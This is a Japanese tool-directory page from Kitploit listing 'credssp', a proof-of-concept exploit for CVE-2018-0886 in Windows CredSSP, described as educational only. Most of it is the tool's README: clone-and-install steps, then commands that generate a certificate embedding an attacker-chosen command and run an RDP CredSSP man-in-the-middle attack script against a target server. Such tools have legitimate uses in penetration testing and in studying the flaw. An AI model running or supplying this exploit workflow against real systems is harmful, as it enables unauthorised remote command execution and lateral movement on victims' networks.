Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
credssp — CVE-2018-0886 を実証するコード | Kitploit
ツール/GitHubGitHub/preempt/credssp
脆弱性分析エクスプロイト横移動ペネトレーションテスト学習と教育レッドチーミング
GitHubpreempt/credssp

credssp

CVE-2018-0886 を実証するコード

リポジトリを見る
267576年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

credssp

これはCVE-2018-0886を悪用するためのPoCコードです。教育目的のみで使用してください。 これはrdpyプロジェクト(https://github.com/preempt/rdpy)のフォークに依存しており、credsspリレーも可能にします。

著者: Eyal Karni, Preempt [email protected]

ビルド

手順 (Linux)

Ubuntu 14を使用している場合は、installファイルを確認してください。 これはUbuntu 16.04でテストされています。

root@kitploit:~
$ git clone https://github.com/preempt/rdpy.git rdpy
$ git clone https://github.com/preempt/credssp.git 
$ cd credssp/install
$ sh install.sh
$ cd ../../rdpy
$ sudo python setup.py install
  • かなりクリーンな初期状態を前提としています。最初に関連コンポーネント(cryptography、pyopensslなど)をアンインストールするのが最善です(pip uninstall cryptography)。
  • これを正常に実行するには、別のバージョンのopensslをインストールする必要があります。インストールスクリプトがその処理を行います。
  • 説明されている順序で手順に従ってください。

エクスプロイトの実行

任意のドメインからサーバー認証に適した証明書をエクスポートします。 (これはRDPに使用されます https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn781533(v=ws.11))

脆弱性を悪用する(ペイロードを含む)証明書を生成するには、次を使用します:

root@kitploit:~
$ python credssp/bin/gen_cmd.py -c ExportedCert -o exploitc.pem -k exploitk.pem CMD 

(ExportedCert は手順1でエクスポートした証明書です。 exploitc.pem と exploitk.pem は、それぞれ生成された証明書と秘密鍵です。)

攻撃スクリプトを実行するには:

root@kitploit:~
$ python /usr/local/bin/rdpy-rdpcredsspmitm.py -k exploitk.pem -c exploitc.pem TargetServer

詳細はスクリプトの使用法セクション(--help)にあります。

ツールをダウンロード